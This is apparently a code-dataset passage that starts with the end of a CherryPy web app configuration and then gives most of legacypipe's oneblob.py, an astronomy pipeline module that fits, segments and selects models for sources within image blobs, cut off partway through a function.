'tools.staticdir.dir': _curdir+"/static"},
'/downloads':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/downloads"},
'/images':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/images"}
}
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# 表示在 OpenSfhit 執行
application = cherrypy.Application(Hello(), config=application_conf)
else:
# 表示在近端執行
cherrypy.quickstart(Hello(), config=application_conf)
| gpl-3.0 |
legacysurvey/pipeline | py/legacypipe/oneblob.py | 1 | 92323 | from __future__ import print_function
import numpy as np
import time
from astrometry.util.ttime import Time
from astrometry.util.resample import resample_with_wcs, OverlapError
from astrometry.util.fits import fits_table
from astrometry.util.plotutils import dimshow
from tractor import Tractor, PointSource, Image, Catalog, Patch
from tractor.galaxy import (DevGalaxy, ExpGalaxy,
disable_galaxy_cache, enable_galaxy_cache)
from tractor.patch import ModelMask
from tractor.sersic import SersicGalaxy
from legacypipe.survey import (RexGalaxy, GaiaSource,
LegacyEllipseWithPriors, LegacySersicIndex, get_rgb)
from legacypipe.bits import IN_BLOB
from legacypipe.coadds import quick_coadds
from legacypipe.runbrick_plots import _plot_mods
rgbkwargs_resid = dict(resids=True)
import logging
logger = logging.getLogger('legacypipe.oneblob')
def info(*args):
from legacypipe.utils import log_info
log_info(logger, args)
def debug(*args):
from legacypipe.utils import log_debug
log_debug(logger, args)
# singleton
cpu_arch = None
def get_cpu_arch():
global cpu_arch
import os
if cpu_arch is not None:
return cpu_arch
family = None
model = None
modelname = None
if os.path.exists('/proc/cpuinfo'):
for line in open('/proc/cpuinfo').readlines():
words = [w.strip() for w in line.strip().split(':')]
if words[0] == 'cpu family' and family is None:
family = int(words[1])
#print('Set CPU family', family)
if words[0] == 'model' and model is None:
model = int(words[1])
#print('Set CPU model', model)
if words[0] == 'model name' and modelname is None:
modelname = words[1]
#print('CPU model', modelname)
codenames = {
# NERSC Cori machines
(6, 63): 'has',
(6, 87): 'knl',
}
cpu_arch = codenames.get((family, model), '')
return cpu_arch
def one_blob(X):
'''
Fits sources contained within a "blob" of pixels.
'''
if X is None:
return None
(nblob, iblob, Isrcs, brickwcs, bx0, by0, blobw, blobh, blobmask, timargs,
srcs, bands, plots, ps, reoptimize, iterative, use_ceres, refmap,
large_galaxies_force_pointsource, less_masking) = X
debug('Fitting blob number %i: blobid %i, nsources %i, size %i x %i, %i images' %
(nblob, iblob, len(Isrcs), blobw, blobh, len(timargs)))
if len(timargs) == 0:
return None
LegacySersicIndex.stepsize = 0.001
if plots:
import pylab as plt
plt.figure(2, figsize=(3,3))
plt.subplots_adjust(left=0.01, right=0.99, bottom=0.01, top=0.99)
plt.figure(1)
t0 = time.process_time()
# A local WCS for this blob
blobwcs = brickwcs.get_subimage(bx0, by0, blobw, blobh)
# Per-source measurements for this blob
B = fits_table()
B.sources = srcs
B.Isrcs = Isrcs
B.iblob = iblob
B.blob_x0 = np.zeros(len(B), np.int16) + bx0
B.blob_y0 = np.zeros(len(B), np.int16) + by0
# Did sources start within the blob?
ok,x0,y0 = blobwcs.radec2pixelxy(
np.array([src.getPosition().ra for src in srcs]),
np.array([src.getPosition().dec for src in srcs]))
safe_x0 = np.clip(np.round(x0-1).astype(int), 0,blobw-1)
safe_y0 = np.clip(np.round(y0-1).astype(int), 0,blobh-1)
B.init_x = safe_x0
B.init_y = safe_y0
B.started_in_blob = blobmask[safe_y0, safe_x0]
# This uses 'initial' pixel positions, because that's what determines
# the fitting behaviors.
B.brightblob = refmap[safe_y0, safe_x0].astype(np.int16)
B.cpu_source = np.zeros(len(B), np.float32)
B.blob_width = np.zeros(len(B), np.int16) + blobw
B.blob_height = np.zeros(len(B), np.int16) + blobh
B.blob_npix = np.zeros(len(B), np.int32) + np.sum(blobmask)
B.blob_nimages= np.zeros(len(B), np.int16) + len(timargs)
B.blob_symm_width = np.zeros(len(B), np.int16)
B.blob_symm_height = np.zeros(len(B), np.int16)
B.blob_symm_npix = np.zeros(len(B), np.int32)
B.blob_symm_nimages = np.zeros(len(B), np.int16)
B.hit_limit = np.zeros(len(B), bool)
ob = OneBlob('%i'%(nblob+1), blobwcs, blobmask, timargs, srcs, bands,
plots, ps, use_ceres, refmap,
large_galaxies_force_pointsource,
less_masking)
B = ob.run(B, reoptimize=reoptimize, iterative_detection=iterative)
B.blob_totalpix = np.zeros(len(B), np.int32) + ob.total_pix
ok,x1,y1 = blobwcs.radec2pixelxy(
np.array([src.getPosition().ra for src in B.sources]),
np.array([src.getPosition().dec for src in B.sources]))
B.finished_in_blob = blobmask[
np.clip(np.round(y1-1).astype(int), 0, blobh-1),
np.clip(np.round(x1-1).astype(int), 0, blobw-1)]
assert(len(B.finished_in_blob) == len(B))
assert(len(B.finished_in_blob) == len(B.started_in_blob))
# Setting values here (after .run() has completed) means that iterative sources
# (which get merged with the original table B) get values also.
B.cpu_arch = np.zeros(len(B), dtype='U3')
B.cpu_arch[:] = get_cpu_arch()
B.cpu_blob = np.empty(len(B), np.float32)
t1 = time.process_time()
B.cpu_blob[:] = t1 - t0
B.blob = np.empty(len(B), np.int32)
B.blob[:] = iblob
return B
class OneBlob(object):
def __init__(self, name, blobwcs, blobmask, timargs, srcs, bands,
plots, ps, use_ceres, refmap,
large_galaxies_force_pointsource,
less_masking):
self.name = name
self.blobwcs = blobwcs
self.pixscale = self.blobwcs.pixel_scale()
self.blobmask = blobmask
self.srcs = srcs
self.bands = bands
self.plots = plots
self.refmap = refmap
#self.plots_per_source = False
self.plots_per_source = plots
self.plots_per_model = False
# blob-1-data.png, etc
self.plots_single = False
self.ps = ps
self.use_ceres = use_ceres
self.deblend = False
self.large_galaxies_force_pointsource = large_galaxies_force_pointsource
self.less_masking = less_masking
self.tims = self.create_tims(timargs)
self.total_pix = sum([np.sum(t.getInvError() > 0) for t in self.tims])
self.plots2 = False
alphas = [0.1, 0.3, 1.0]
self.optargs = dict(priors=True, shared_params=False, alphas=alphas,
print_progress=True)
self.blobh,self.blobw = blobmask.shape
self.bigblob = (self.blobw * self.blobh) > 100*100
if self.bigblob:
debug('Big blob:', name)
self.trargs = dict()
# if use_ceres:
# from tractor.ceres_optimizer import CeresOptimizer
# ceres_optimizer = CeresOptimizer()
# self.optargs.update(scale_columns=False,
# scaled=False,
# dynamic_scale=False)
# self.trargs.update(optimizer=ceres_optimizer)
# else:
# self.optargs.update(dchisq = 0.1)
#from tractor.constrained_optimizer import ConstrainedOptimizer
#self.trargs.update(optimizer=ConstrainedOptimizer())
from tractor.dense_optimizer import ConstrainedDenseOptimizer
self.trargs.update(optimizer=ConstrainedDenseOptimizer())
self.optargs.update(dchisq = 0.1)
def run(self, B, reoptimize=False, iterative_detection=True,
compute_metrics=True):
trun = tlast = Time()
# Not quite so many plots...
self.plots1 = self.plots
cat = Catalog(*self.srcs)
if self.plots:
import pylab as plt
self._initial_plots()
from legacypipe.detection import plot_boundary_map
plt.clf()
dimshow(self.rgb)
ax = plt.axis()
bitset = ((self.refmap & IN_BLOB['MEDIUM']) != 0)
plot_boundary_map(bitset, rgb=(255,0,0), iterations=2)
bitset = ((self.refmap & IN_BLOB['BRIGHT']) != 0)
plot_boundary_map(bitset, rgb=(200,200,0), iterations=2)
bitset = ((self.refmap & IN_BLOB['GALAXY']) != 0)
plot_boundary_map(bitset, rgb=(0,255,0), iterations=2)
plt.axis(ax)
plt.title('Reference-source Masks')
self.ps.savefig()
if not self.bigblob:
debug('Fitting just fluxes using initial models...')
self._fit_fluxes(cat, self.tims, self.bands)
tr = self.tractor(self.tims, cat)
if self.plots:
self._plots(tr, 'Initial models')
# Optimize individual sources, in order of flux.
# First, choose the ordering...
Ibright = _argsort_by_brightness(cat, self.bands, ref_first=True)
# The sizes of the model patches fit here are determined by the
# sources themselves, ie by the size of the mod patch returned by
# src.getModelPatch(tim)
if len(cat) > 1:
self._optimize_individual_sources_subtract(
cat, Ibright, B.cpu_source)
else:
self._optimize_individual_sources(tr, cat, Ibright, B.cpu_source)
# Optimize all at once?
if len(cat) > 1 and len(cat) <= 10:
cat.thawAllParams()
for i,src in enumerate(cat):
if getattr(src, 'freezeparams', False):
debug('Frozen source', src, '-- keeping as-is!')
cat.freezeParam(i)
tr.optimize_loop(**self.optargs)
if self.plots:
self._plots(tr, 'After source fitting')
plt.clf()
self._plot_coadd(self.tims, self.blobwcs, model=tr)
plt.title('After source fitting')
self.ps.savefig()
if self.plots_single:
plt.figure(2)
mods = list(tr.getModelImages())
coimgs,_ = quick_coadds(self.tims, self.bands, self.blobwcs, images=mods,
fill_holes=False)
dimshow(get_rgb(coimgs,self.bands), ticks=False)
plt.savefig('blob-%s-initmodel.png' % (self.name))
res = [(tim.getImage() - mod) for tim,mod in zip(self.tims, mods)]
coresids,_ = quick_coadds(self.tims, self.bands, self.blobwcs, images=res)
dimshow(get_rgb(coresids, self.bands, resids=True), ticks=False)
plt.savefig('blob-%s-initresid.png' % (self.name))
dimshow(get_rgb(coresids, self.bands), ticks=False)
plt.savefig('blob-%s-initsub.png' % (self.name))
plt.figure(1)
debug('Blob', self.name, 'finished initial fitting:', Time()-tlast)
tlast = Time()
self.compute_segmentation_map()
# Next, model selections: point source vs dev/exp vs composite.
B = self.run_model_selection(cat, Ibright, B,
iterative_detection=iterative_detection)
debug('Blob', self.name, 'finished model selection:', Time()-tlast)
tlast = Time()
# Cut down to just the kept sources
cat = B.sources
I = np.array([i for i,s in enumerate(cat) if s is not None])
B.cut(I)
cat = Catalog(*B.sources)
tr.catalog = cat
if self.plots:
self._plots(tr, 'After model selection')
if self.plots_single:
plt.figure(2)
mods = list(tr.getModelImages())
coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs, images=mods,
fill_holes=False)
dimshow(get_rgb(coimgs,self.bands), ticks=False)
plt.savefig('blob-%s-model.png' % (self.name))
res = [(tim.getImage() - mod) for tim,mod in zip(self.tims, mods)]
coresids,nil = quick_coadds(self.tims, self.bands, self.blobwcs, images=res)
dimshow(get_rgb(coresids, self.bands, resids=True), ticks=False)
plt.savefig('blob-%s-resid.png' % (self.name))
plt.figure(1)
# Do another quick round of flux-only fitting?
# This does horribly -- fluffy galaxies go out of control because
# they're only constrained by pixels within this blob.
#_fit_fluxes(cat, tims, bands, use_ceres, alphas)
# A final optimization round?
if reoptimize:
if self.plots:
import pylab as plt
modimgs = list(tr.getModelImages())
co,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
images=modimgs)
plt.clf()
dimshow(get_rgb(co, self.bands))
plt.title('Before final opt')
self.ps.savefig()
Ibright = _argsort_by_brightness(cat, self.bands, ref_first=True)
if len(cat) > 1:
self._optimize_individual_sources_subtract(
cat, Ibright, B.cpu_source)
else:
self._optimize_individual_sources(tr, cat, Ibright, B.cpu_source)
if self.plots:
import pylab as plt
modimgs = list(tr.getModelImages())
co,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
images=modimgs)
plt.clf()
dimshow(get_rgb(co, self.bands))
plt.title('After final opt')
self.ps.savefig()
if compute_metrics:
# Compute variances on all parameters for the kept model
B.srcinvvars = [None for i in range(len(B))]
cat.thawAllRecursive()
cat.freezeAllParams()
for isub in range(len(B.sources)):
cat.thawParam(isub)
src = cat[isub]
if src is None:
cat.freezeParam(isub)
continue
# Convert to "vanilla" ellipse parameterization
nsrcparams = src.numberOfParams()
_convert_ellipses(src)
assert(src.numberOfParams() == nsrcparams)
# Compute inverse-variances
allderivs = tr.getDerivs()
ivars = _compute_invvars(allderivs)
assert(len(ivars) == nsrcparams)
B.srcinvvars[isub] = ivars
assert(len(B.srcinvvars[isub]) == cat[isub].numberOfParams())
cat.freezeParam(isub)
# Check for sources with zero inverse-variance -- I think these
# can be generated during the "Simultaneous re-opt" stage above --
# sources can get scattered outside the blob.
I, = np.nonzero([np.sum(iv) > 0 for iv in B.srcinvvars])
if len(I) < len(B):
debug('Keeping', len(I), 'of', len(B),'sources with non-zero ivar')
B.cut(I)
cat = Catalog(*B.sources)
tr.catalog = cat
M = _compute_source_metrics(B.sources, self.tims, self.bands, tr)
for k,v in M.items():
B.set(k, v)
info('Blob', self.name, 'finished, total:', Time()-trun)
return B
def compute_segmentation_map(self):
# Use ~ saddle criterion to segment the blob / mask other sources
from functools import reduce
from legacypipe.detection import detection_maps
from astrometry.util.multiproc import multiproc
from scipy.ndimage.morphology import binary_dilation, binary_fill_holes
from scipy.ndimage.measurements import label
# Compute per-band detection maps
mp = multiproc()
detmaps,detivs,satmaps = detection_maps(
self.tims, self.blobwcs, self.bands, mp)
# same as in runbrick.py
saturated_pix = reduce(np.logical_or,
[binary_dilation(satmap > 0, iterations=4) for satmap in satmaps])
del satmaps
maxsn = 0
for i,(detmap,detiv) in enumerate(zip(detmaps,detivs)):
sn = detmap * np.sqrt(detiv)
if self.plots:
import pylab as plt
plt.clf()
plt.subplot(2,2,1)
plt.imshow(detmap, interpolation='nearest', origin='lower')
plt.title('detmap %s' % self.bands[i])
plt.colorbar()
plt.subplot(2,2,2)
plt.imshow(detiv, interpolation='nearest', origin='lower')
plt.title('detiv %s' % self.bands[i])
plt.colorbar()
plt.subplot(2,2,3)
plt.imshow(sn, interpolation='nearest', origin='lower')
plt.title('detsn %s' % self.bands[i])
plt.colorbar()
self.ps.savefig()
# HACK - no SEDs...
maxsn = np.maximum(maxsn, sn)
if self.plots:
plt.clf()
plt.imshow(saturated_pix, interpolation='nearest', origin='lower',
vmin=0, vmax=1, cmap='gray')
plt.title('saturated pix')
self.ps.savefig()
plt.clf()
plt.imshow(maxsn, interpolation='nearest', origin='lower')
plt.title('max s/n for segmentation')
self.ps.savefig()
segmap = np.empty((self.blobh, self.blobw), int)
segmap[:,:] = -1
_,ix,iy = self.blobwcs.radec2pixelxy(
np.array([src.getPosition().ra for src in self.srcs]),
np.array([src.getPosition().dec for src in self.srcs]))
ix = np.clip(np.round(ix)-1, 0, self.blobw-1).astype(int)
iy = np.clip(np.round(iy)-1, 0, self.blobh-1).astype(int)
# Do not compute segmentation map for sources in the CLUSTER mask
Iseg, = np.nonzero((self.refmap[iy, ix] & IN_BLOB['CLUSTER']) == 0)
# Zero out the S/N in CLUSTER mask
maxsn[(self.refmap & IN_BLOB['CLUSTER']) > 0] = 0.
# (also zero out the satmap)
saturated_pix[(self.refmap & IN_BLOB['CLUSTER']) > 0] = False
Ibright = _argsort_by_brightness([self.srcs[i] for i in Iseg], self.bands)
rank = np.empty(len(Iseg), int)
rank[Ibright] = np.arange(len(Iseg), dtype=int)
rankmap = dict([(Iseg[i],r) for r,i in enumerate(Ibright)])
todo = set(Iseg)
thresholds = list(range(3, int(np.ceil(maxsn.max()))))
for thresh in thresholds:
#print('S/N', thresh, ':', len(todo), 'sources to find still')
if len(todo) == 0:
break
####
hot = np.logical_or(maxsn >= thresh, saturated_pix)
hot = binary_fill_holes(hot)
blobs,_ = label(hot)
srcblobs = blobs[iy[Iseg], ix[Iseg]]
done = set()
blobranks = {}
for i,(b,r) in enumerate(zip(srcblobs, rank)):
if not b in blobranks:
blobranks[b] = []
blobranks[b].append(r)
for t in todo:
bl = blobs[iy[t], ix[t]]
if bl == 0:
# ??
done.add(t)
continue
if rankmap[t] == min(blobranks[bl]):
#print('Source', t, 'has rank', rank[t], 'vs blob ranks', blobranks[bl])
segmap[blobs == bl] = t
#print('Source', t, 'is isolated at S/N', thresh)
done.add(t)
todo.difference_update(done)
del hot, maxsn, saturated_pix
# ensure that each source owns a tiny radius around its center in the segmentation map.
# If there is more than one source in that radius, each pixel gets assigned to its nearest source.
# record the current distance to nearest source
kingdom = np.empty(segmap.shape, np.uint8)
kingdom[:,:,] = 255
H,W = segmap.shape
xcoords = np.arange(W)
ycoords = np.arange(H)
for i in Ibright:
radius = 5
x,y = ix[i], iy[i]
yslc = slice(max(0, y-radius), min(H, y+radius+1))
xslc = slice(max(0, x-radius), min(W, x+radius+1))
slc = (yslc, xslc)
# Radius to nearest earlier source
oldr = kingdom[slc]
# Radius to new source
newr = np.hypot(xcoords[np.newaxis, xslc] - x, ycoords[yslc, np.newaxis] - y)
assert(newr.shape == oldr.shape)
newr = (newr + 0.5).astype(np.uint8)
# Pixels that are within range and closer to this source than any other.
owned = (newr <= radius) * (newr < oldr)
segmap[slc][owned] = i
kingdom[slc][owned] = newr[owned]
del kingdom, xcoords, ycoords
self.segmap = segmap
if self.plots:
import pylab as plt
plt.clf()
dimshow(segmap)
ax = plt.axis()
from legacypipe.detection import plot_boundary_map
plot_boundary_map(segmap >= 0)
plt.plot(ix, iy, 'r.')
plt.axis(ax)
plt.title('Segmentation map')
self.ps.savefig()
plt.clf()
dimshow(self.rgb)
ax = plt.axis()
for i in range(len(self.srcs)):
plot_boundary_map(segmap == i)
plt.plot(ix, iy, 'r.')
plt.axis(ax)
plt.title('Segments')
self.ps.savefig()
def run_model_selection(self, cat, Ibright, B, iterative_detection=True):
# We compute & subtract initial models for the other sources while
# fitting each source:
# -Remember the original images
# -Compute initial models for each source (in each tim)
# -Subtract initial models from images
# -During fitting, for each source:
# -add back in the source's initial model (to each tim)
# -fit, with Catalog([src])
# -subtract final model (from each tim)
# -Replace original images
models = SourceModels()
# Remember original tim images
models.save_images(self.tims)
# Create initial models for each tim x each source
models.create(self.tims, cat, subtract=True)
N = len(cat)
B.dchisq = np.zeros((N, 5), np.float32)
B.all_models = np.array([{} for i in range(N)])
B.all_model_ivs = np.array([{} for i in range(N)])
B.all_model_cpu = np.array([{} for i in range(N)])
B.all_model_hit_limit = np.array([{} for i in range(N)])
B.all_model_opt_steps = np.array([{} for i in range(N)])
# Model selection for sources, in decreasing order of brightness
for numi,srci in enumerate(Ibright):
src = cat[srci]
debug('Model selection for source %i of %i in blob %s; sourcei %i' %
(numi+1, len(Ibright), self.name, srci))
cpu0 = time.process_time()
if getattr(src, 'freezeparams', False):
info('Frozen source', src, '-- keeping as-is!')
B.sources[srci] = src
continue
# Add this source's initial model back in.
models.add(srci, self.tims)
if self.plots_single:
import pylab as plt
plt.figure(2)
coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
fill_holes=False)
rgb = get_rgb(coimgs,self.bands)
plt.imsave('blob-%s-%s-bdata.png' % (self.name, srci), rgb,
origin='lower')
plt.figure(1)
# Model selection for this source.
keepsrc = self.model_selection_one_source(src, srci, models, B)
B.sources[srci] = keepsrc
cat[srci] = keepsrc
models.update_and_subtract(srci, keepsrc, self.tims)
if self.plots_single:
plt.figure(2)
tr = self.tractor(self.tims, cat)
coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
fill_holes=False)
dimshow(get_rgb(coimgs,self.bands), ticks=False)
plt.savefig('blob-%s-%i-sub.png' % (self.name, srci))
plt.figure(1)
cpu1 = time.process_time()
B.cpu_source[srci] += (cpu1 - cpu0)
# At this point, we have subtracted our best model fits for each source
# to be kept; the tims contain residual images.
if iterative_detection:
if self.plots and False:
# One plot per tim is a little much, even for me...
import pylab as plt
for tim in self.tims:
plt.clf()
plt.suptitle('Iterative detection: %s' % tim.name)
plt.subplot(2,2,1)
plt.imshow(tim.getImage(), interpolation='nearest', origin='lower',
vmin=-5.*tim.sig1, vmax=10.*tim.sig1)
plt.title('image')
plt.subplot(2,2,2)
plt.imshow(tim.getImage(), interpolation='nearest', origin='lower')
plt.title('image')
plt.colorbar()
plt.subplot(2,2,3)
plt.imshow(tim.getInvError(), interpolation='nearest', origin='lower')
plt.title('inverr')
plt.colorbar()
plt.subplot(2,2,4)
plt.imshow(tim.getImage() * (tim.getInvError() > 0), interpolation='nearest', origin='lower')
plt.title('image*(inverr>0)')
plt.colorbar()
self.ps.savefig()
Bnew = self.iterative_detection(B, models)
if Bnew is not None:
from astrometry.util.fits import merge_tables
# B.sources is a list of objects... merge() with
# fillzero doesn't handle them well.
srcs = B.sources
newsrcs = Bnew.sources
B.delete_column('sources')
Bnew.delete_column('sources')
# also scalars don't work well
iblob = B.iblob
B.delete_column('iblob')
B = merge_tables([B, Bnew], columns='fillzero')
B.sources = srcs + newsrcs
B.iblob = iblob
models.restore_images(self.tims)
del models
return B
def iterative_detection(self, Bold, models):
# Compute per-band detection maps
from legacypipe.detection import sed_matched_filters, detection_maps, run_sed_matched_filters
from astrometry.util.multiproc import multiproc
if self.plots:
coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
fill_holes=False)
import pylab as plt
plt.clf()
dimshow(get_rgb(coimgs,self.bands), ticks=False)
plt.title('Iterative detection: residuals')
self.ps.savefig()
mp = multiproc()
detmaps,detivs,satmaps = detection_maps(
self.tims, self.blobwcs, self.bands, mp)
# from runbrick.py
from scipy.ndimage.morphology import binary_dilation
satmaps = [binary_dilation(satmap > 0, iterations=4) for satmap in satmaps]
# Also compute detection maps on the (first-round) model images!
# save tim.images (= residuals at this point)
realimages = [tim.getImage() for tim in self.tims]
for tim,mods in zip(self.tims, models.models):
modimg = np.zeros_like(tim.getImage())
for mod in mods:
if mod is None:
continue
mod.addTo(modimg)
tim.data = modimg
if self.plots:
coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
fill_holes=False)
import pylab as plt
plt.clf()
dimshow(get_rgb(coimgs,self.bands), ticks=False)
plt.title('Iterative detection: first-round models')
self.ps.savefig()
mod_detmaps,mod_detivs,_ = detection_maps(
self.tims, self.blobwcs, self.bands, mp)
# revert
for tim,img in zip(self.tims, realimages):
tim.data = img
if self.plots:
import pylab as plt
plt.clf()
dimshow(get_rgb(detmaps,self.bands), ticks=False)
plt.title('Iterative detection: detection maps')
self.ps.savefig()
plt.clf()
dimshow(get_rgb(mod_detmaps,self.bands), ticks=False)
plt.title('Iterative detection: model detection maps')
self.ps.savefig()
# if self.plots:
# import pylab as plt
# plt.clf()
# for det,div,b in zip(detmaps, detivs, self.bands):
# plt.hist((det * np.sqrt(div)).ravel(), range=(-5,10),
# bins=50, histtype='step', color=dict(z='m').get(b, b))
# plt.title('Detection pixel S/N')
# self.ps.savefig()
detlogger = logging.getLogger('legacypipe.detection')
detloglvl = detlogger.getEffectiveLevel()
detlogger.setLevel(detloglvl + 10)
SEDs = sed_matched_filters(self.bands)
# Avoid re-detecting sources at positions close to initial
# source positions (including ones that will get cut!)
avoid_x = Bold.init_x
avoid_y = Bold.init_y
avoid_r = np.zeros(len(avoid_x), np.float32) + 2.
nsigma = 6.
Tnew,newcat,_ = run_sed_matched_filters(
SEDs, self.bands, detmaps, detivs, (avoid_x,avoid_y,avoid_r),
self.blobwcs, nsigma=nsigma, saturated_pix=satmaps, veto_map=None,
plots=False, ps=None, mp=mp)
#plots=self.plots, ps=self.ps, mp=mp)
detlogger.setLevel(detloglvl)
if Tnew is None:
debug('No iterative sources detected!')
return None
debug('Found', len(Tnew), 'new sources')
Tnew.cut(self.refmap[Tnew.iby, Tnew.ibx] == 0)
debug('Cut to', len(Tnew), 'on refmap')
if len(Tnew) == 0:
return None
detsns = np.dstack([m*np.sqrt(iv) for m,iv in zip(detmaps, detivs)])
modsns = np.dstack([m*np.sqrt(iv) for m,iv in zip(mod_detmaps, mod_detivs)])
det_max = np.max(detsns[Tnew.iby, Tnew.ibx, :], axis=1)
mod_max = np.max(modsns[Tnew.iby, Tnew.ibx, :], axis=1)
det_sum = np.sum(detsns[Tnew.iby, Tnew.ibx, :], axis=1)
mod_sum = np.sum(modsns[Tnew.iby, Tnew.ibx, :], axis=1)
del detsns, modsns
if self.plots:
coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
fill_holes=False)
import pylab as plt
plt.clf()
dimshow(get_rgb(coimgs,self.bands), ticks=False)
ax = plt.axis()
crossa = dict(ms=10, mew=1.5)
rr = np.array([s.getPosition().ra for s in Bold.sources
if s is not None])
dd = np.array([s.getPosition().dec for s in Bold.sources
if s is not None])
_,xx,yy = self.blobwcs.radec2pixelxy(rr, dd)
plt.plot(Bold.init_x, Bold.init_y, 'o', ms=5, mec='r', mfc='none', label='Avoid (r=2)')
plt.plot(xx-1, yy-1, 'r+', label='Old', **crossa)
plt.plot(Tnew.ibx, Tnew.iby, '+', color=(0,1,0), label='New',
**crossa)
plt.axis(ax)
plt.legend()
plt.title('Iterative detections')
self.ps.savefig()
plt.clf()
plt.loglog(mod_max, det_max, 'k.')
ax = plt.axis()
plt.plot([1e-3, 1e6], [1e-3, 1e6], 'b--', lw=3, alpha=0.3)
plt.axis(ax)
plt.xlabel('Model detection S/N: max')
plt.ylabel('Iterative detection S/N: max')
self.ps.savefig()
plt.clf()
plt.loglog(mod_sum, det_sum, 'k.')
ax = plt.axis()
plt.plot([1e-3, 1e6], [1e-3, 1e6], 'b--', lw=3, alpha=0.3)
plt.axis(ax)
plt.xlabel('Model detection S/N: sum')
plt.ylabel('Iterative detection S/N: sum')
self.ps.savefig()
plt.clf()
dimshow(get_rgb(coimgs,self.bands), ticks=False)
ax = plt.axis()
crossa = dict(ms=10, mew=1.5)
plt.plot(xx-1, yy-1, 'r+', label='Old', **crossa)
plt.plot(Tnew.ibx, Tnew.iby, '+', color=(0,1,0), label='New',
**crossa)
for x,y,r1,r2 in zip(Tnew.ibx, Tnew.iby, det_max/np.maximum(mod_max, 1.), det_sum/np.maximum(mod_sum, len(self.bands))):
plt.text(x, y, '%.1f, %.1f' % (r1,r2),
color='k', fontsize=10,
bbox=dict(facecolor='w', alpha=0.5))
plt.axis(ax)
plt.legend()
plt.title('Iterative detections')
self.ps.savefig()
B = 0.2
Tnew.cut(det_max > B * np.maximum(mod_max, 1.))
debug('Cut to', len(Tnew), 'iterative sources compared to model detection map')
if len(Tnew) == 0:
return None
info('Measuring', len(Tnew), 'iterative sources')
from tractor import NanoMaggies, RaDecPos
newsrcs = [PointSource(RaDecPos(t.ra, t.dec),
NanoMaggies(**dict([(b,1) for b in self.bands])))
for t in Tnew]
# Save
oldsrcs = self.srcs
self.srcs = newsrcs
Bnew = fits_table()
Bnew.sources = newsrcs
Bnew.Isrcs = np.array([-1]*len(Bnew))
Bnew.cpu_source = np.zeros(len(Bnew), np.float32)
Bnew.blob_symm_nimages = np.zeros(len(Bnew), np.int16)
Bnew.blob_symm_npix = np.zeros(len(Bnew), np.int32)
Bnew.blob_symm_width = np.zeros(len(Bnew), np.int16)
Bnew.blob_symm_height = np.zeros(len(Bnew), np.int16)
Bnew.hit_limit = np.zeros(len(Bnew), bool)
Bnew.brightblob = self.refmap[Tnew.iby, Tnew.ibx].astype(np.int16)
# Be quieter during iterative detection!
bloblogger = logging.getLogger('legacypipe.oneblob')
loglvl = bloblogger.getEffectiveLevel()
bloblogger.setLevel(loglvl + 10)
# Run the whole oneblob pipeline on the iterative sources!
Bnew = self.run(Bnew, iterative_detection=False, compute_metrics=False)
bloblogger.setLevel(loglvl)
# revert
self.srcs = oldsrcs
if len(Bnew) == 0:
return None
return Bnew
def model_selection_one_source(self, src, srci, models, B):
if self.bigblob:
mods = [mod[srci] for mod in models.models]
srctims,modelMasks = _get_subimages(self.tims, mods, src)
# Create a little local WCS subregion for this source, by
# resampling non-zero inverrs from the srctims into blobwcs
insrc = np.zeros((self.blobh,self.blobw), bool)
for tim in srctims:
try:
Yo,Xo,Yi,Xi,nil = resample_with_wcs(
self.blobwcs, tim.subwcs, intType=np.int16)
except:
continue
insrc[Yo,Xo] |= (tim.inverr[Yi,Xi] > 0)
if np.sum(insrc) == 0:
# No source pixels touching blob... this can
# happen when a source scatters outside the blob
# in the fitting stage. Drop the source here.
return None
yin = np.max(insrc, axis=1)
xin = np.max(insrc, axis=0)
yl,yh = np.flatnonzero(yin)[np.array([0,-1])]
xl,xh = np.flatnonzero(xin)[np.array([0,-1])]
del insrc
srcwcs = self.blobwcs.get_subimage(xl, yl, 1+xh-xl, 1+yh-yl)
srcwcs_x0y0 = (xl, yl)
# A mask for which pixels in the 'srcwcs' square are occupied.
srcblobmask = self.blobmask[yl:yh+1, xl:xh+1]
else:
modelMasks = models.model_masks(srci, src)
srctims = self.tims
srcwcs = self.blobwcs
srcwcs_x0y0 = (0, 0)
srcblobmask = self.blobmask
if self.plots_per_source:
# This is a handy blob-coordinates plot of the data
# going into the fit.
import pylab as plt
plt.clf()
nil,nil,coimgs,nil = quick_coadds(srctims, self.bands,self.blobwcs,
fill_holes=False, get_cow=True)
dimshow(get_rgb(coimgs, self.bands))
ax = plt.axis()
pos = src.getPosition()
ok,x,y = self.blobwcs.radec2pixelxy(pos.ra, pos.dec)
ix,iy = int(np.round(x-1)), int(np.round(y-1))
plt.plot(x-1, y-1, 'r+')
plt.axis(ax)
plt.title('Model selection: data')
self.ps.savefig()
# Mask out other sources while fitting this one, by
# finding symmetrized blobs of significant pixels
mask_others = True
if mask_others:
from legacypipe.detection import detection_maps
from astrometry.util.multiproc import multiproc
from scipy.ndimage.morphology import binary_dilation, binary_fill_holes
from scipy.ndimage.measurements import label
# Compute per-band detection maps
mp = multiproc()
detmaps,detivs,_ = detection_maps(
srctims, srcwcs, self.bands, mp)
# Compute the symmetric area that fits in this 'tim'
pos = src.getPosition()
ok,xx,yy = srcwcs.radec2pixelxy(pos.ra, pos.dec)
bh,bw = srcblobmask.shape
ix = int(np.clip(np.round(xx-1), 0, bw-1))
iy = int(np.clip(np.round(yy-1), 0, bh-1))
flipw = min(ix, bw-1-ix)
fliph = min(iy, bh-1-iy)
flipblobs = np.zeros(srcblobmask.shape, bool)
# The slice where we can perform symmetrization
slc = (slice(iy-fliph, iy+fliph+1),
slice(ix-flipw, ix+flipw+1))
# Go through the per-band detection maps, marking significant pixels
for i,(detmap,detiv) in enumerate(zip(detmaps,detivs)):
sn = detmap * np.sqrt(detiv)
flipsn = np.zeros_like(sn)
# Symmetrize
flipsn[slc] = np.minimum(sn[slc],
np.flipud(np.fliplr(sn[slc])))
# just OR the detection maps per-band...
flipblobs |= (flipsn > 5.)
